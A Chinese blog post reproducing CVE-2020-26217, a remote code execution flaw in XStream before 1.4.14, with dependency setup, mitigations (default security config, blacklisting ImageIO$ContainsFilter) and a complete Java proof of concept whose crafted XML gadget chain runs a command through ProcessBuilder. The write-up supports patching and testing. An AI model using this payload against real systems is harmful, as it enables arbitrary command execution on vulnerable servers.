zoukankan      html  css  js  c++  java

  • 【漏洞复现】CVE-2020-26217 | XStream远程代码执行漏洞

    写在前面

    影响范围为XStream < 1.4.14,小版本也需要加黑名单,但是复现过程中只有所有常规版本和下图红标小版本复现成功:

    另外还需要XPP3、xmlpull这两个jar包,JDK9无法触发成功。
    复现过程中发现1.4.10及以上版本通过在使用fromXML方法前开启默认安全配置:

    XStream xStream = new XStream();
XStream.setupDefaultSecurity(xStream);    #开启默认安全配置
String xml = ""
xStream.fromXML(xml);

    来完成漏洞规避,经测试无法触发漏洞,无需升级到1.4.14。
    当然通过补充本次被绕过的黑名单:javax.imageio.ImageIO$ContainsFilter 也可以进行临时防护,可参考官方说明中的Workaround部分:http://x-stream.github.io/CVE-2020-26217.html

    准备环境

    1.XStream Core
<!-- https://mvnrepository.com/artifact/com.thoughtworks.xstream/xstream -->
<dependency>
    <groupId>com.thoughtworks.xstream</groupId>
    <artifactId>xstream</artifactId>
    <version>1.4.9</version>
</dependency>

2.XPP3
<!-- https://mvnrepository.com/artifact/org.ogce/xpp3 -->
<dependency>
    <groupId>org.ogce</groupId>
    <artifactId>xpp3</artifactId>
    <version>1.1.6</version>
</dependency>
3.xmlpull
<!-- https://mvnrepository.com/artifact/xmlpull/xmlpull -->
<dependency>
    <groupId>xmlpull</groupId>
    <artifactId>xmlpull</artifactId>
    <version>1.1.3.1</version>
</dependency>

    根据官方说明编写测试POC:

    import com.thoughtworks.xstream.XStream;
public class vultest {
	public static void main(String[] args) {
		XStream xStream = new XStream();
		//XStream.setupDefaultSecurity(xStream);
		String xml = "<map>
" +
				"  <entry>
" +
				"    <jdk.nashorn.internal.objects.NativeString>
" +
				"      <flags>0</flags>
" +
				"      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
" +
				"        <dataHandler>
" +
				"          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
" +
				"            <contentType>text/plain</contentType>
" +
				"            <is class='java.io.SequenceInputStream'>
" +
				"              <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
" +
				"                <iterator class='javax.imageio.spi.FilterIterator'>
" +
				"                  <iter class='java.util.ArrayList$Itr'>
" +
				"                    <cursor>0</cursor>
" +
				"                    <lastRet>-1</lastRet>
" +
				"                    <expectedModCount>1</expectedModCount>
" +
				"                    <outer-class>
" +
				"                      <java.lang.ProcessBuilder>
" +
				"                        <command>
" +
				"                          <string>calc</string>
" +                  #修改此处string来调用ProcessBuilder执行命令,此处以calc为例
				"                        </command>
" +
				"                      </java.lang.ProcessBuilder>
" +
				"                    </outer-class>
" +
				"                  </iter>
" +
				"                  <filter class='javax.imageio.ImageIO$ContainsFilter'>
" +
				"                    <method>
" +
				"                      <class>java.lang.ProcessBuilder</class>
" +
				"                      <name>start</name>
" +
				"                      <parameter-types/>
" +
				"                    </method>
" +
				"                    <name>start</name>
" +
				"                  </filter>
" +
				"                  <next/>
" +
				"                </iterator>
" +
				"                <type>KEYS</type>
" +
				"              </e>
" +
				"              <in class='java.io.ByteArrayInputStream'>
" +
				"                <buf></buf>
" +
				"                <pos>0</pos>
" +
				"                <mark>0</mark>
" +
				"                <count>0</count>
" +
				"              </in>
" +
				"            </is>
" +
				"            <consumed>false</consumed>
" +
				"          </dataSource>
" +
				"          <transferFlavors/>
" +
				"        </dataHandler>
" +
				"        <dataLen>0</dataLen>
" +
				"      </value>
" +
				"    </jdk.nashorn.internal.objects.NativeString>
" +
				"    <string>test</string>
" +
				"  </entry>
" +
				"</map>";
		//final Iterator<?> iterator = (Iterator<?>) xStream.fromXML(xml);
		//iterator.hasNext();
		xStream.fromXML(xml);
	}

}

    漏洞复现

    1.编译上述poc:
    javac -cp xstream-1.4.13.jar vultest.java
    2.运行验证:
    "C:Program FilesJavajre1.8.0_231injava.exe" -classpath .;xstream-1.4.13.jar;xmlpull-1.1.3.1.jar;xpp3-1.1.6.jar vultest #JDK9测试无法触发,1.8可以,故使用1.8来验证

    参考

    [1]https://x-stream.github.io/CVE-2020-26217.html
  • 相关阅读:
    常用DOS命令
    uCGUI窗口重绘代码分析
    STM32的FSMC总线驱动ili9341,掉电重启无法正常显示的问题
    再次编译 arm toolchains
    GDB和GDB Server
    QT Creator 环境使用 remote debug 调试 arm 程序
    [转]一个简洁的 systemd 操作指南
    用 bottle.py 写了个简单的升级包上传
    批量 ping 测试脚本(IP 扫描)
    float 对整形的取余运算
  • 原文地址:https://www.cnblogs.com/303donatello/p/13998245.html
Copyright © 2011-2022 走看看